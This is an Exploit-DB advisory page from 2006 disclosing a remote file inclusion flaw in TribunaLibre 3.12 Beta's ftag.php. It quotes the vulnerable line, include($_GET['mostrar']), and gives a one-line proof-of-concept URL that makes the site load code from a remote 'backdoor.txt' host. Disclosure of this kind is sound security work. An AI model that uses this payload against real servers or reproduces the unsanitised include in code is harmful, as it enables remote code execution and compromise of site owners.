TribunaLibre 3.12 Beta - 'ftag.php' Remote File Inclusion

EDB-ID:

2501


Author:

DarkFig

Type:

webapps


Platform:

PHP

Date:

2006-10-10


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: TribunaLibre v3.12 Beta
# Download....: http://www.phplibre.com.es/downloads/TribunaLibre_v3.12_Beta.zip
# Poc.........: http://victim.com/ftag.php?mostrar=http://backdoor.txt?
# Vuln.code...: Line 106, <? include($_GET['mostrar']); ?>

# milw0rm.com [2006-10-10]